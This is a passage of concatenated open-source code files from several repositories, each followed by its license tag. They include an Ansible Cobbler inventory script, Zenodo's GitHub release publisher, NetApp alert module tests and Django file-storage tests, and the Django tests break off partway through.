        """TCLASS objects are defined to handle traffic class option

    tclass() -> TCLASS object

    Create a new TCLASS object

    Methods of TCLASS objects:

    set(string, int) -- initialize a traffic class option
    set_from_data(string) -- initialize a traffic class option from raw data
    get() -- return traffic class

    Attributes of TCLASS objects:

    data -- TCLASS object as a raw string
    size -- size in bytes of `tclass' option (not TCLASS object)"""
        def __init__(self):
            SocketOptionInteger.__init__(self)
        def set(self, i):
            """set(int) -> None

    Initialize TCLASS object. Arg1 is traffic class.
    Return None."""
            # Traffic class is an 8-bit field, hence the 0xff upper bound.
            SocketOptionInteger.set(self, i, 0xff,
                                    '%s: invalid traffic class value')
        def set_from_data(self, data):
            """set_from_data(string) -> None

    Initialize TCLASS object from raw data (arg1).
    Return None."""
            SocketOptionInteger.set_from_data(self, data)
        def get(self):
            """get() -> int

    Return traffic class."""
            return SocketOptionInteger.get(self)
| gpl-2.0 |
KohlsTechnology/ansible | contrib/inventory/cobbler.py | 8 | 10592 | #!/usr/bin/env python
"""
Cobbler external inventory script
=================================
Ansible has a feature where instead of reading from /etc/ansible/hosts
as a text file, it can query external programs to obtain the list
of hosts, groups the hosts are in, and even variables to assign to each host.
To use this, copy this file over /etc/ansible/hosts and chmod +x the file.
This, more or less, allows you to keep one central database containing
info about all of your managed instances.
This script is an example of sourcing that data from Cobbler
(https://cobbler.github.io). With cobbler each --mgmt-class in cobbler
will correspond to a group in Ansible, and --ks-meta variables will be
passed down for use in templates or even in argument lines.
NOTE: The cobbler system names will not be used. Make sure a
cobbler --dns-name is set for each cobbler system. If a system
appears with two DNS names we do not add it twice because we don't want
ansible talking to it twice. The first one found will be used. If no
--dns-name is set the system will NOT be visible to ansible. We do
not add cobbler system names because there is no requirement in cobbler
that those correspond to addresses.
Tested with Cobbler 2.0.11.
Changelog:
- 2015-06-21 dmccue: Modified to support run-once _meta retrieval, results in
higher performance at ansible startup. Groups are determined by owner rather than
default mgmt_classes. DNS name determined from hostname. cobbler values are written
to a 'cobbler' fact namespace
- 2013-09-01 pgehres: Refactored implementation to make use of caching and to
limit the number of connections to external cobbler server for performance.
Added use of cobbler.ini file to configure settings. Tested with Cobbler 2.4.0
"""
# (c) 2012, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible,
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
######################################################################
import argparse
import ConfigParser
import os
import re
from time import time
import xmlrpclib
try:
import json
except ImportError:
import simplejson as json
from six import iteritems
# NOTE -- this file assumes Ansible is being accessed FROM the cobbler
# server, so it does not attempt to login with a username and password.
# this will be addressed in a future version of this script.
orderby_keyname = 'owners' # alternatively 'mgmt_classes'
class CobblerInventory(object):
def __init__(self):
""" Main execution path """
self.conn = None
self.inventory = dict() # A list of groups and the hosts in that group
self.cache = dict() # Details about hosts in the inventory
# Read settings and parse CLI arguments
self.read_settings()
self.parse_cli_args()
# Cache
if self.args.refresh_cache:
self.update_cache()
elif not self.is_cache_valid():
self.update_cache()
else:
self.load_inventory_from_cache()
self.load_cache_from_cache()
data_to_print = ""
# Data to print
if self.args.host:
data_to_print += self.get_host_info()
else:
self.inventory['_meta'] = {'hostvars': {}}
for hostname in self.cache:
self.inventory['_meta']['hostvars'][hostname] = {'cobbler': self.cache[hostname]}
data_to_print += self.json_format_dict(self.inventory, True)
print(data_to_print)
def _connect(self):
if not self.conn:
self.conn = xmlrpclib.Server(self.cobbler_host, allow_none=True)
self.token = None
if self.cobbler_username is not None:
self.token = self.conn.login(self.cobbler_username, self.cobbler_password)
def is_cache_valid(self):
""" Determines if the cache files have expired, or if it is still valid """
if os.path.isfile(self.cache_path_cache):
mod_time = os.path.getmtime(self.cache_path_cache)
current_time = time()
if (mod_time + self.cache_max_age) > current_time:
if os.path.isfile(self.cache_path_inventory):
return True
return False
def read_settings(self):
""" Reads the settings from the cobbler.ini file """
config = ConfigParser.SafeConfigParser()
config.read(os.path.dirname(os.path.realpath(__file__)) + '/cobbler.ini')
self.cobbler_host = config.get('cobbler', 'host')
self.cobbler_username = None
self.cobbler_password = None
if config.has_option('cobbler', 'username'):
self.cobbler_username = config.get('cobbler', 'username')
if config.has_option('cobbler', 'password'):
self.cobbler_password = config.get('cobbler', 'password')
# Cache related
cache_path = config.get('cobbler', 'cache_path')
self.cache_path_cache = cache_path + "/ansible-cobbler.cache"
self.cache_path_inventory = cache_path + "/ansible-cobbler.index"
self.cache_max_age = config.getint('cobbler', 'cache_max_age')
def parse_cli_args(self):
""" Command line argument processing """
parser = argparse.ArgumentParser(description='Produce an Ansible Inventory file based on Cobbler')
parser.add_argument('--list', action='store_true', default=True, help='List instances (default: True)')
parser.add_argument('--host', action='store', help='Get all the variables about a specific instance')
parser.add_argument('--refresh-cache', action='store_true', default=False,
help='Force refresh of cache by making API requests to cobbler (default: False - use cache files)')
self.args = parser.parse_args()
def update_cache(self):
""" Make calls to cobbler and save the output in a cache """
self._connect()
self.groups = dict()
self.hosts = dict()
if self.token is not None:
data = self.conn.get_systems(self.token)
else:
data = self.conn.get_systems()
for host in data:
# Get the FQDN for the host and add it to the right groups
dns_name = host['hostname'] # None
ksmeta = None
interfaces = host['interfaces']
# hostname is often empty for non-static IP hosts
if dns_name == '':
for (iname, ivalue) in iteritems(interfaces):
if ivalue['management'] or not ivalue['static']:
this_dns_name = ivalue.get('dns_name', None)
if this_dns_name is not None and this_dns_name is not "":
dns_name = this_dns_name
if dns_name == '' or dns_name is None:
continue
status = host['status']
profile = host['profile']
classes = host[orderby_keyname]
if status not in self.inventory:
self.inventory[status] = []
self.inventory[status].append(dns_name)
if profile not in self.inventory:
self.inventory[profile] = []
self.inventory[profile].append(dns_name)
for cls in classes:
if cls not in self.inventory:
self.inventory[cls] = []
self.inventory[cls].append(dns_name)
# Since we already have all of the data for the host, update the host details as well
# The old way was ksmeta only -- provide backwards compatibility
self.cache[dns_name] = host
if "ks_meta" in host:
for key, value in iteritems(host["ks_meta"]):
self.cache[dns_name][key] = value
self.write_to_cache(self.cache, self.cache_path_cache)
self.write_to_cache(self.inventory, self.cache_path_inventory)
def get_host_info(self):
    """Return the cached variables for the host named in ``self.args.host``,
    JSON-encoded. Refreshes the cache once before reporting an unknown host."""
    if not self.cache:
        # Nothing loaded yet -- pull the host index in from the cache file.
        self.load_cache_from_cache()

    hostname = self.args.host
    if hostname not in self.cache:
        # Possibly stale data: refresh once before giving up.
        self.update_cache()
    if hostname not in self.cache:
        # The host genuinely does not exist (anymore).
        return self.json_format_dict({}, True)
    return self.json_format_dict(self.cache[hostname], True)
def push(self, my_dict, key, element):
    """Append *element* to the list stored at *key*, creating it on first use."""
    my_dict.setdefault(key, []).append(element)
def load_inventory_from_cache(self):
    """Read the group inventory from its cache file into ``self.inventory``.

    Fixes a resource leak: the original opened the file and never closed
    it; a context manager now guarantees the handle is released.
    """
    with open(self.cache_path_inventory, 'r') as cache:
        self.inventory = json.loads(cache.read())
def load_cache_from_cache(self):
    """Read the host-variable cache from its file into ``self.cache``.

    Fixes a resource leak: the original opened the file and never closed
    it; a context manager now guarantees the handle is released.
    """
    with open(self.cache_path_cache, 'r') as cache:
        self.cache = json.loads(cache.read())
def write_to_cache(self, data, filename):
    """Serialize *data* to pretty JSON and write it to *filename*.

    Uses a context manager instead of explicit open/close so the handle is
    released even if the write raises.
    """
    json_data = self.json_format_dict(data, True)
    with open(filename, 'w') as cache:
        cache.write(json_data)
def to_safe(self, word):
    """Map every character outside [A-Za-z0-9-] to '_' so the result can be
    used as an Ansible group name."""
    def _allowed(ch):
        return ('A' <= ch <= 'Z') or ('a' <= ch <= 'z') or ('0' <= ch <= '9') or ch == '-'
    return ''.join(ch if _allowed(ch) else '_' for ch in word)
def json_format_dict(self, data, pretty=False):
    """Dump *data* as a JSON string; ``pretty=True`` sorts keys and indents."""
    dump_kwargs = {'sort_keys': True, 'indent': 2} if pretty else {}
    return json.dumps(data, **dump_kwargs)
CobblerInventory()
| gpl-3.0 |
mithrandir123/director | src/python/ddapp/meshmanager.py | 5 | 1538 | from ddapp import lcmobjectcollection
from ddapp import geometryencoder
from ddapp import ioUtils
from ddapp.uuidutil import newUUID
import os
class MeshManager(object):
    """Registry of uuid -> vtkPolyData meshes, synchronized over an LCM
    object collection so cooperating processes share the same geometry."""

    def __init__(self):
        self.meshes = {}
        self.cacheDirectory = '/tmp'
        self.cacheDataType = 'stl'
        self.collection = lcmobjectcollection.LCMObjectCollection(channel='MESH_COLLECTION_COMMAND')
        self.collection.connectDescriptionUpdated(self._onDescriptionUpdated)

    def add(self, polyData, publish=True):
        """Register polyData under a fresh uuid and optionally broadcast it.

        Returns the new mesh id.
        """
        meshId = newUUID()
        self.meshes[meshId] = polyData
        if publish:
            encoded = geometryencoder.encodePolyData(polyData)
            self.collection.updateDescription(dict(uuid=meshId, data=encoded), notify=False)
        return meshId

    def get(self, meshId):
        """Return the mesh registered under meshId, or None when unknown."""
        return self.meshes.get(meshId)

    def getFilesystemFilename(self, meshId):
        """Return an on-disk filename for meshId, writing the cache file on
        first request. Returns None for an unknown mesh id."""
        if meshId not in self.meshes:
            return None
        filename = os.path.join(self.cacheDirectory, '%s.%s' % (meshId, self.cacheDataType))
        if not os.path.isfile(filename):
            ioUtils.writePolyData(self.get(meshId), filename)
        return filename

    def _onDescriptionUpdated(self, collection, descriptionId):
        """Decode a mesh announced by a peer and store it locally."""
        desc = collection.getDescription(descriptionId)
        meshId = desc['uuid']
        if meshId not in self.meshes:
            self.meshes[meshId] = geometryencoder.decodePolyData(desc['data'])
| bsd-3-clause |
ddico/sale-workflow | sale_order_add_variants/model/res_config.py | 28 | 1241 | # -*- coding: utf-8 -*-
##############################################################################
#
# Author: Hugo Santos
# Copyright 2015 FactorLibre
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import models, fields
class SaleConfiguration(models.TransientModel):
    """Sale settings: expose the 'add variants from template' option."""
    _inherit = 'sale.config.settings'

    # Checking this box puts users in the implied security group, which
    # unlocks adding product variants directly from a template on sale orders.
    group_sale_add_variants = fields.Boolean(
        implied_group='sale_order_add_variants.group_sale_add_variants',
        string='Allow to add variants from template in Sale order')
windinthew/audacity | lib-src/lv2/suil/waflib/Tools/dmd.py | 316 | 1511 | #! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! http://waf.googlecode.com/git/docs/wafbook/single.html#_obtaining_the_waf_file
import sys
from waflib.Tools import ar,d
from waflib.Configure import conf
@conf
def find_dmd(conf):
    """Locate a D compiler (dmd/dmd2/ldc) and verify it really is dmd or ldc."""
    conf.find_program(['dmd', 'dmd2', 'ldc'], var='D')
    help_text = conf.cmd_and_log([conf.env.D, '--help'])
    if "D Compiler v" not in help_text:
        version_text = conf.cmd_and_log([conf.env.D, '-version'])
        if "based on DMD v1." not in version_text:
            conf.fatal("detected compiler is not dmd/ldc")
@conf
def common_flags_ldc(conf):
    """Flag defaults specific to the ldc compiler."""
    env = conf.env
    env['DFLAGS'] = ['-d-version=Posix']
    env['LINKFLAGS'] = []
    # ldc spells position-independent code differently from dmd.
    env['DFLAGS_dshlib'] = ['-relocation-model=pic']
@conf
def common_flags_dmd(conf):
    """Flag templates shared by dmd-style compilers."""
    env = conf.env

    # Compile step.
    env['D_SRC_F'] = ['-c']
    env['D_TGT_F'] = '-of%s'

    # Link step: dmd acts as its own linker; -L... is forwarded to it.
    env['D_LINKER'] = env['D']
    env['DLNK_SRC_F'] = ''
    env['DLNK_TGT_F'] = '-of%s'
    env['DINC_ST'] = '-I%s'

    env['DSHLIB_MARKER'] = env['DSTLIB_MARKER'] = ''
    env['DSTLIB_ST'] = env['DSHLIB_ST'] = '-L-l%s'
    env['DSTLIBPATH_ST'] = env['DLIBPATH_ST'] = '-L-L%s'

    env['LINKFLAGS_dprogram'] = ['-quiet']
    env['DFLAGS_dshlib'] = ['-fPIC']
    env['LINKFLAGS_dshlib'] = ['-L-shared']

    # Generation of .di interface (header) files.
    env['DHEADER_ext'] = '.di'
    env['DFLAGS_d_with_header'] = ['-H', '-Hf']
    env['D_HDR_F'] = '%s'
def configure(conf):
    """Configuration entry point: detect dmd/ldc and set up D tool flags."""
    conf.find_dmd()

    if sys.platform == 'win32':
        help_text = conf.cmd_and_log([conf.env.D, '--help'])
        if "D Compiler v2." in help_text:
            conf.fatal('dmd2 on Windows is not supported, use gdc or ldc2 instead')

    conf.load('ar')
    conf.load('d')
    conf.common_flags_dmd()
    conf.d_platform_flags()

    # ldc shares most of dmd's interface but needs a few overrides.
    if 'ldc' in str(conf.env.D):
        conf.common_flags_ldc()
| gpl-2.0 |
backslash112/django-tastypie | tests/slashless/tests.py | 19 | 2007 | from django.conf import settings
from django.core.urlresolvers import reverse, NoReverseMatch
from django.http import HttpRequest
import json
from testcases import TestCaseWithFixture
class ViewsWithoutSlashesTestCase(TestCaseWithFixture):
    """Exercise API endpoints addressed without trailing slashes."""
    urls = 'slashless.api.urls'

    def setUp(self):
        super(ViewsWithoutSlashesTestCase, self).setUp()
        # Flip DEBUG on for the duration of the test; restored in tearDown.
        self.old_debug = settings.DEBUG
        settings.DEBUG = True

    def tearDown(self):
        settings.DEBUG = self.old_debug
        super(ViewsWithoutSlashesTestCase, self).tearDown()

    def test_gets_without_trailing_slash(self):
        # Top-level API index.
        response = self.client.get('/api/v1', data={'format': 'json'})
        self.assertEqual(response.status_code, 200)
        payload = json.loads(response.content.decode('utf-8'))
        self.assertEqual(len(payload), 2)
        self.assertEqual(payload['notes'], {'list_endpoint': '/api/v1/notes', 'schema': '/api/v1/notes/schema'})

        # Collection endpoint.
        response = self.client.get('/api/v1/notes', data={'format': 'json'})
        self.assertEqual(response.status_code, 200)
        payload = json.loads(response.content.decode('utf-8'))
        self.assertEqual(len(payload), 2)
        self.assertEqual(payload['meta']['limit'], 20)
        self.assertEqual(len(payload['objects']), 2)
        self.assertEqual([obj['title'] for obj in payload['objects']], [u'First Post!', u'Another Post'])

        # Detail endpoint.
        response = self.client.get('/api/v1/notes/1', data={'format': 'json'})
        self.assertEqual(response.status_code, 200)
        payload = json.loads(response.content.decode('utf-8'))
        self.assertEqual(len(payload), 9)
        self.assertEqual(payload['title'], u'First Post!')

        # Multi-object "set" endpoint.
        response = self.client.get('/api/v1/notes/set/2;1', data={'format': 'json'})
        self.assertEqual(response.status_code, 200)
        payload = json.loads(response.content.decode('utf-8'))
        obj_ids = sorted(o["id"] for o in payload["objects"])
        self.assertEqual(obj_ids, [1, 2])
| bsd-3-clause |
tiborsimko/zenodo | zenodo/modules/github/api.py | 1 | 4767 | # -*- coding: utf-8 -*-
#
# This file is part of Zenodo.
# Copyright (C) 2016 CERN.
#
# Zenodo is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Zenodo is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Zenodo; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""Zenodo GitHub API."""
from __future__ import absolute_import
import uuid
from flask import current_app
from invenio_db import db
from invenio_files_rest.models import ObjectVersion
from invenio_github.api import GitHubRelease
from invenio_github.utils import get_contributors, get_owner
from invenio_indexer.api import RecordIndexer
from zenodo.modules.deposit.tasks import datacite_register
from ..deposit.loaders import legacyjson_v1_translator
from ..jsonschemas.utils import current_jsonschemas
class ZenodoGitHubRelease(GitHubRelease):
    """Zenodo GitHub Release.

    Specializes the invenio-github release handler: builds Zenodo-style
    deposit metadata and publishes a GitHub release as a Zenodo record.
    """

    @property
    def metadata(self):
        """Return extracted metadata."""
        output = dict(self.defaults)
        output.update(self.extra_metadata)
        # Add creators if not specified
        if 'creators' not in output:
            output['creators'] = get_contributors(self.gh.api,
                                                  self.repository['id'])
        # Fall back to the repository owner, then to a placeholder, so the
        # deposit always ends up with at least one creator.
        if not output['creators']:
            output['creators'] = get_owner(self.gh.api, self.author)
        if not output['creators']:
            output['creators'] = [dict(name='Unknown', affiliation='')]
        return legacyjson_v1_translator({'metadata': output})

    @property
    def repo_model(self):
        """Return repository model from relationship."""
        return self.model.repository

    def publish(self):
        """Publish GitHub release as record.

        Runs inside a nested DB transaction: on any failure everything is
        rolled back and the partially-indexed deposit is removed from the
        search index before re-raising.
        """
        id_ = uuid.uuid4()
        deposit = None
        try:
            db.session.begin_nested()
            deposit = self.deposit_class.create(self.metadata, id_=id_)

            deposit['_deposit']['created_by'] = self.event.user_id
            deposit['_deposit']['owners'] = [self.event.user_id]

            # Fetch the deposit files
            for key, url in self.files:
                # Make a HEAD request to get GitHub to compute the
                # Content-Length.
                res = self.gh.api.session.head(url, allow_redirects=True)
                # Now, download the file
                res = self.gh.api.session.get(url, stream=True)
                if res.status_code != 200:
                    raise Exception(
                        "Could not retrieve archive from GitHub: {url}"
                        .format(url=url)
                    )

                size = int(res.headers.get('Content-Length', 0))
                ObjectVersion.create(
                    bucket=deposit.files.bucket,
                    key=key,
                    stream=res.raw,
                    size=size or None,
                    mimetype=res.headers.get('Content-Type'),
                )

            # GitHub-specific SIP store agent
            sip_agent = {
                '$schema': current_jsonschemas.path_to_url(
                    current_app.config['SIPSTORE_GITHUB_AGENT_JSONSCHEMA']),
                'user_id': self.event.user_id,
                'github_id': self.release['author']['id'],
                'email': self.gh.account.user.email,
            }
            deposit.publish(user_id=self.event.user_id, sip_agent=sip_agent)
            self.model.recordmetadata = deposit.model
            db.session.commit()

            # Send Datacite DOI registration task
            recid_pid, record = deposit.fetch_published()
            datacite_register.delay(recid_pid.pid_value, str(record.id))
        except Exception:
            db.session.rollback()
            # Remove deposit from index since it was not commited.
            if deposit and deposit.id:
                try:
                    RecordIndexer().delete(deposit)
                except Exception:
                    current_app.logger.exception(
                        "Failed to remove uncommited deposit from index.")
            raise
| gpl-2.0 |
Lujeni/ansible | test/units/modules/storage/netapp/test_netapp_e_alerts.py | 12 | 7474 | # (c) 2018, NetApp Inc.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from ansible.modules.storage.netapp.netapp_e_alerts import Alerts
from units.modules.utils import AnsibleExitJson, AnsibleFailJson, ModuleTestCase, set_module_args
__metaclass__ = type
from units.compat import mock
class AlertsTest(ModuleTestCase):
    """Unit tests for the netapp_e_alerts Ansible module."""

    # Baseline module arguments shared by every test; individual tests
    # override/extend these through _set_args().
    REQUIRED_PARAMS = {
        'api_username': 'rw',
        'api_password': 'password',
        'api_url': 'http://localhost',
        'ssid': '1',
        'state': 'disabled'
    }
    # Dotted path of the HTTP request function that the tests patch out.
    REQ_FUNC = 'ansible.modules.storage.netapp.netapp_e_alerts.request'

    def _set_args(self, **kwargs):
        """Install REQUIRED_PARAMS (plus per-test overrides) as module args."""
        module_args = self.REQUIRED_PARAMS.copy()
        if kwargs is not None:
            module_args.update(kwargs)
        set_module_args(module_args)

    def _validate_args(self, **kwargs):
        """Set args and instantiate the module so argument validation runs."""
        self._set_args(**kwargs)
        Alerts()

    def test_validation_disable(self):
        """Ensure a default configuration succeeds"""
        self._validate_args()

    def test_validation_enable(self):
        """Ensure a typical, default configuration succeeds"""
        self._validate_args(state='enabled', server='localhost', sender='x@y.z', recipients=['a@b.c'])

    def test_validation_fail_required(self):
        """Ensure we fail on missing configuration"""
        # Missing recipients
        with self.assertRaises(AnsibleFailJson):
            self._validate_args(state='enabled', server='localhost', sender='x@y.z')
            Alerts()

        # Missing sender
        with self.assertRaises(AnsibleFailJson):
            self._validate_args(state='enabled', server='localhost', recipients=['a@b.c'])
            Alerts()

        # Missing server
        with self.assertRaises(AnsibleFailJson):
            self._validate_args(state='enabled', sender='x@y.z', recipients=['a@b.c'])

    def test_validation_fail(self):
        # Empty recipients
        with self.assertRaises(AnsibleFailJson):
            self._validate_args(state='enabled', server='localhost', sender='x@y.z', recipients=[])

        # Bad sender
        with self.assertRaises(AnsibleFailJson):
            self._validate_args(state='enabled', server='localhost', sender='y.z', recipients=['a@b.c'])

    def test_get_configuration(self):
        """Validate retrieving the current configuration"""
        self._set_args(state='enabled', server='localhost', sender='x@y.z', recipients=['a@b.c'])

        expected = 'result'
        alerts = Alerts()
        # Expecting an update
        with mock.patch(self.REQ_FUNC, return_value=(200, expected)) as req:
            actual = alerts.get_configuration()
            self.assertEqual(expected, actual)
            self.assertEqual(req.call_count, 1)

    def test_update_configuration(self):
        """Validate updating the configuration"""
        # Server-side state the mocked get_configuration() will report.
        initial = dict(alertingEnabled=True,
                       emailServerAddress='localhost',
                       sendAdditionalContactInformation=True,
                       additionalContactInformation='None',
                       emailSenderAddress='x@y.z',
                       recipientEmailAddresses=['x@y.z']
                       )

        args = dict(state='enabled', server=initial['emailServerAddress'], sender=initial['emailSenderAddress'],
                    contact=initial['additionalContactInformation'], recipients=initial['recipientEmailAddresses'])

        self._set_args(**args)

        alerts = Alerts()

        # Ensure when trigger updates when each relevant field is changed
        with mock.patch(self.REQ_FUNC, return_value=(200, None)) as req:
            with mock.patch.object(alerts, 'get_configuration', return_value=initial):
                update = alerts.update_configuration()
                self.assertFalse(update)

                alerts.sender = 'a@b.c'
                update = alerts.update_configuration()
                self.assertTrue(update)
                self._set_args(**args)

                alerts.recipients = ['a@b.c']
                update = alerts.update_configuration()
                self.assertTrue(update)
                self._set_args(**args)

                alerts.contact = 'abc'
                update = alerts.update_configuration()
                self.assertTrue(update)
                self._set_args(**args)

                alerts.server = 'abc'
                update = alerts.update_configuration()
                self.assertTrue(update)

    def test_send_test_email_check(self):
        """Ensure we handle check_mode correctly"""
        self._set_args(test=True)
        alerts = Alerts()
        alerts.check_mode = True
        with mock.patch(self.REQ_FUNC) as req:
            with mock.patch.object(alerts, 'update_configuration', return_value=True):
                alerts.send_test_email()
                self.assertFalse(req.called)

    def test_send_test_email(self):
        """Ensure we send a test email if test=True"""
        self._set_args(test=True)
        alerts = Alerts()

        with mock.patch(self.REQ_FUNC, return_value=(200, dict(response='emailSentOK'))) as req:
            alerts.send_test_email()
            self.assertTrue(req.called)

    def test_send_test_email_fail(self):
        """Ensure we fail if the test returned a failure status"""
        self._set_args(test=True)
        alerts = Alerts()

        ret_msg = 'fail'
        with self.assertRaisesRegexp(AnsibleFailJson, ret_msg):
            with mock.patch(self.REQ_FUNC, return_value=(200, dict(response=ret_msg))) as req:
                alerts.send_test_email()
        self.assertTrue(req.called)

    def test_send_test_email_fail_connection(self):
        """Ensure we fail cleanly if we hit a connection failure"""
        self._set_args(test=True)
        alerts = Alerts()

        with self.assertRaisesRegexp(AnsibleFailJson, r"failed to send"):
            with mock.patch(self.REQ_FUNC, side_effect=Exception) as req:
                alerts.send_test_email()
        self.assertTrue(req.called)

    def test_update(self):
        # Ensure that when test is enabled and alerting is enabled, we run the test
        self._set_args(state='enabled', server='localhost', sender='x@y.z', recipients=['a@b.c'], test=True)
        alerts = Alerts()
        with self.assertRaisesRegexp(AnsibleExitJson, r"enabled"):
            with mock.patch.object(alerts, 'update_configuration', return_value=True):
                with mock.patch.object(alerts, 'send_test_email') as test:
                    alerts.update()
        self.assertTrue(test.called)

        # Ensure we don't run a test when changed=False
        with self.assertRaisesRegexp(AnsibleExitJson, r"enabled"):
            with mock.patch.object(alerts, 'update_configuration', return_value=False):
                with mock.patch.object(alerts, 'send_test_email') as test:
                    alerts.update()
        self.assertFalse(test.called)

        # Ensure that test is not called when we have alerting disabled
        self._set_args(state='disabled')
        alerts = Alerts()
        with self.assertRaisesRegexp(AnsibleExitJson, r"disabled"):
            with mock.patch.object(alerts, 'update_configuration', return_value=True):
                with mock.patch.object(alerts, 'send_test_email') as test:
                    alerts.update()
        self.assertFalse(test.called)
| gpl-3.0 |
frishberg/django | tests/file_storage/tests.py | 4 | 41685 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import errno
import os
import shutil
import sys
import tempfile
import threading
import time
import unittest
from datetime import datetime, timedelta
from django.core.cache import cache
from django.core.exceptions import SuspiciousFileOperation, SuspiciousOperation
from django.core.files.base import ContentFile, File
from django.core.files.storage import FileSystemStorage, get_storage_class
from django.core.files.uploadedfile import (
InMemoryUploadedFile, SimpleUploadedFile, TemporaryUploadedFile,
)
from django.db.models.fields.files import FileDescriptor
from django.test import (
LiveServerTestCase, SimpleTestCase, TestCase, ignore_warnings,
override_settings,
)
from django.test.utils import requires_tz_support
from django.urls import NoReverseMatch, reverse_lazy
from django.utils import six, timezone
from django.utils._os import upath
from django.utils.deprecation import RemovedInDjango20Warning
from django.utils.six.moves.urllib.request import urlopen
from .models import Storage, temp_storage, temp_storage_location
FILE_SUFFIX_REGEX = '[A-Za-z0-9]{7}'
class GetStorageClassTests(SimpleTestCase):
    """Behaviour of django.core.files.storage.get_storage_class()."""

    def test_get_filesystem_storage(self):
        """A valid dotted path resolves to the storage class itself."""
        storage_cls = get_storage_class('django.core.files.storage.FileSystemStorage')
        self.assertEqual(storage_cls, FileSystemStorage)

    def test_get_invalid_storage_module(self):
        """A nonexistent top-level module raises ImportError."""
        with six.assertRaisesRegex(self, ImportError, "No module named '?storage'?"):
            get_storage_class('storage.NonExistingStorage')

    def test_get_nonexisting_storage_class(self):
        """An existing module but missing class raises ImportError."""
        with self.assertRaises(ImportError):
            get_storage_class('django.core.files.storage.NonExistingStorage')

    def test_get_nonexisting_storage_module(self):
        """A missing submodule raises ImportError."""
        # Error message may or may not be the fully qualified path.
        with six.assertRaisesRegex(self, ImportError, "No module named '?(django.core.files.)?non_existing_storage'?"):
            get_storage_class('django.core.files.non_existing_storage.NonExistingStorage')
class FileSystemStorageTests(unittest.TestCase):
    """FileSystemStorage-specific behaviour outside the shared suite."""

    def test_deconstruction(self):
        """deconstruct() reports the class path plus the kwargs it was built with."""
        path, args, kwargs = temp_storage.deconstruct()
        self.assertEqual(path, "django.core.files.storage.FileSystemStorage")
        self.assertEqual(args, tuple())
        self.assertEqual(kwargs, {'location': temp_storage_location})

        kwargs_orig = {
            'location': temp_storage_location,
            'base_url': 'http://myfiles.example.com/'
        }
        storage = FileSystemStorage(**kwargs_orig)
        path, args, kwargs = storage.deconstruct()
        self.assertEqual(kwargs, kwargs_orig)

    def test_lazy_base_url_init(self):
        """
        FileSystemStorage.__init__() shouldn't evaluate base_url.
        """
        storage = FileSystemStorage(base_url=reverse_lazy('app:url'))
        # The lazy URL only blows up when actually resolved, not at init.
        with self.assertRaises(NoReverseMatch):
            storage.url(storage.base_url)
class FileStorageTests(SimpleTestCase):
storage_class = FileSystemStorage
def setUp(self):
    # A throwaway media root for the storage under test, plus a second
    # directory whose name is guaranteed to contain mixed case (used by the
    # case-sensitivity test).
    self.temp_dir = tempfile.mkdtemp()
    self.storage = self.storage_class(location=self.temp_dir, base_url='/test_media_url/')
    self.temp_dir2 = tempfile.mkdtemp(suffix='aBc')
def tearDown(self):
    # Remove both scratch directories created in setUp.
    for tree in (self.temp_dir, self.temp_dir2):
        shutil.rmtree(tree)
def test_empty_location(self):
    """An empty location string falls back to the current working directory."""
    storage = self.storage_class(location='')
    self.assertEqual(storage.base_location, '')
    self.assertEqual(storage.location, upath(os.getcwd()))
def test_file_access_options(self):
    """Write, read back and delete a file through the storage API."""
    name = 'storage_test'
    self.assertFalse(self.storage.exists(name))

    handle = self.storage.open(name, 'w')
    handle.write('storage contents')
    handle.close()
    self.assertTrue(self.storage.exists(name))

    handle = self.storage.open(name, 'r')
    self.assertEqual(handle.read(), 'storage contents')
    handle.close()

    self.storage.delete(name)
    self.assertFalse(self.storage.exists(name))
def _test_file_time_getter(self, getter):
    """Run the shared time-getter checks under both USE_TZ settings."""
    # Check for correct behavior under both USE_TZ=True and USE_TZ=False.
    # The tests are similar since they both set up a situation where the
    # system time zone, Django's TIME_ZONE, and UTC are distinct.
    self._test_file_time_getter_tz_handling_on(getter)
    self._test_file_time_getter_tz_handling_off(getter)
@override_settings(USE_TZ=True, TIME_ZONE='Africa/Algiers')
def _test_file_time_getter_tz_handling_on(self, getter):
    """With USE_TZ=True, `getter` must return an aware datetime in UTC."""
    # Django's TZ (and hence the system TZ) is set to Africa/Algiers which
    # is UTC+1 and has no DST change. We can set the Django TZ to something
    # else so that UTC, Django's TIME_ZONE, and the system timezone are all
    # different.
    now_in_algiers = timezone.make_aware(datetime.now())

    with timezone.override(timezone.get_fixed_timezone(-300)):
        # At this point the system TZ is +1 and the Django TZ
        # is -5. The following will be aware in UTC.
        now = timezone.now()
        self.assertFalse(self.storage.exists('test.file.tz.on'))

        f = ContentFile('custom contents')
        f_name = self.storage.save('test.file.tz.on', f)
        self.addCleanup(self.storage.delete, f_name)
        dt = getter(f_name)
        # dt should be aware, in UTC
        self.assertTrue(timezone.is_aware(dt))
